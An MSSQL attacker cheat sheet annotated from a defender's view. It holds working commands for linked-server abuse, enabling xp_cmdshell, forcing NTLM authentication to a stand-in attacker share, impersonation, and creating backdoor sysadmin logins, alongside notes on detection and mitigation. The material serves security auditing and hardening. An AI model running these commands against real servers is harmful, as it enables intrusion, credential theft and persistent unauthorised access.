MSSQL Attacker Cheat Sheet
==========================
-- Reviewer annotations (defender view): each section below notes the permission the
-- commands need and what an audit, error-log or monitoring control would observe.
-- The statements themselves are reproduced unchanged.

🔍 Context & Privilege
----------------------
SELECT SYSTEM_USER, ORIGINAL_LOGIN(); -- Show current and original login
-- ORIGINAL_LOGIN() keeps returning the login that connected even after an
-- EXECUTE AS context switch; detections keyed only on SYSTEM_USER miss impersonated sessions.
SELECT IS_SRVROLEMEMBER('sysadmin'); -- Are you sysadmin?
-- Returns 1 or 0; NULL when the role or login name is not valid.
SELECT DB_NAME(); -- Current DB context
SELECT @@SERVERNAME, SERVERPROPERTY('ServerName');-- Current server name

🔐 User & Role Enumeration
--------------------------
-- Catalog views honour metadata visibility: without VIEW ANY DEFINITION (or sysadmin)
-- a login generally sees only principals it owns or has a permission on, so
-- least-privilege logins bound what this enumerates.
SELECT name, type_desc, is_disabled FROM sys.sql_logins; -- SQL logins
SELECT name FROM sys.server_principals WHERE type_desc = 'SERVER_ROLE'; -- Server roles
SELECT name, authentication_type_desc FROM sys.database_principals -- DB-level users
WHERE type IN ('S','U','G') AND name NOT LIKE 'db_%';

🔗 Linked Server Enumeration
---------------------------
EXEC sp_linkedservers; -- List linked servers
EXEC sp_helplinkedsrvlogin 'LinkedServer'; -- Login mappings
-- Defender check: a mapping to a fixed remote login that is sysadmin on the remote
-- instance hands those rights to every local caller allowed to use the linked server.
-- Map per-login, or to a least-privilege remote account, instead.
SELECT is_rpc_out_enabled FROM sys.servers WHERE name = 'LinkedServer'; -- RPC OUT?
-- RPC OUT is the option that permits EXEC (...) AT [LinkedServer]; it is typically
-- off by default and should stay off unless a documented consumer needs it.

🚨 Check sysadmin access on a Linked Server
------------------------------------------
-- The inner query runs on the remote instance under the mapped remote login,
-- not under the local caller's identity.
SELECT * FROM OPENQUERY([LinkedServer], 'SELECT IS_SRVROLEMEMBER(''sysadmin'')');

💣 Abuse Linked Server with sysadmin Rights
------------------------------------------
-- If RPC OUT is enabled:
EXEC ('EXEC xp_cmdshell ''whoami'';') AT [LinkedServer];
EXEC ('CREATE LOGIN pwned WITH PASSWORD = ''P@ss123!''; EXEC sp_addsrvrolemember ''pwned'', ''sysadmin'';') AT [LinkedServer];
-- Both statements execute on the remote instance, so they surface in the remote
-- server's audit and error log under the mapped remote login rather than the
-- originating caller; attribution needs correlation with the local side's
-- linked-server activity.
-- If RPC is disabled:
SELECT * FROM OPENQUERY([LinkedServer], 'SELECT name FROM sys.sql_logins');

🧰 Enable & Use xp_cmdshell
---------------------------
-- xp_cmdshell is disabled by default. Enabling it requires ALTER SETTINGS
-- (sysadmin or serveradmin), and sp_configure writes
-- "Configuration option 'xp_cmdshell' changed from 0 to 1" to the SQL Server
-- error log — a cheap, high-signal alert.
-- Enable:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Use:
-- Runs under the SQL Server service account for sysadmin callers (the configured
-- proxy account otherwise), so a low-privilege service account bounds the impact.
EXEC xp_cmdshell 'whoami';
-- Check if enabled:
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';

📦 SMB/NTLM Hash Capture
------------------------
EXEC xp_dirtree '\\<attacker_ip>\\share'; -- Triggers NTLM authentication
-- The outbound connection is made by the SQL Server service account, so that is the
-- credential exposed. Mitigations: block outbound SMB (TCP 445) from database hosts,
-- require SMB signing, and run the service under a low-privilege (group) managed
-- service account.

🔎 Recon for Creds
------------------
-- List all tables:
SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;
-- Search for password/credential fields:
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME LIKE '%pass%' OR COLUMN_NAME LIKE '%user%' OR COLUMN_NAME LIKE '%cred%';
-- Defender check: anything this finds readable in plain text is a data-handling
-- defect — hash passwords, keep other secrets out of the database, or protect the
-- columns with column-level encryption / Always Encrypted.

🎭 Impersonation
----------------
-- Check who you can impersonate:
SELECT DISTINCT b.name FROM sys.server_permissions a JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
-- Granting IMPERSONATE on a sysadmin login is equivalent to granting sysadmin; review
-- these grants with the same rigour as role membership. The
-- SERVER_PRINCIPAL_IMPERSONATION_GROUP audit action group records EXECUTE AS LOGIN.
-- Login as that user
EXECUTE AS LOGIN = 'dev'; SELECT SYSTEM_USER;
GO
-- Are we sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
GO
-- GO is a client batch separator (sqlcmd/SSMS), not T-SQL; the EXECUTE AS context
-- above persists across batches until REVERT or the session ends, which is why
-- SYSTEM_USER reports the impersonated login while ORIGINAL_LOGIN() still does not.
-- Impersonate:
EXECUTE AS LOGIN = 'some_user'; SELECT SYSTEM_USER; REVERT;

🔐 Create a New Sysadmin (Local or Remote)
------------------------------------------
-- Adding a member to sysadmin itself requires sysadmin. Both statements are covered
-- by SQL Server Audit (SERVER_PRINCIPAL_CHANGE_GROUP and
-- SERVER_ROLE_MEMBER_CHANGE_GROUP); alert on any new sysadmin member outside a
-- change window, and reconcile sysadmin membership against an approved list.
CREATE LOGIN evil WITH PASSWORD = 'B@dPass123!';
EXEC sp_addsrvrolemember 'evil', 'sysadmin';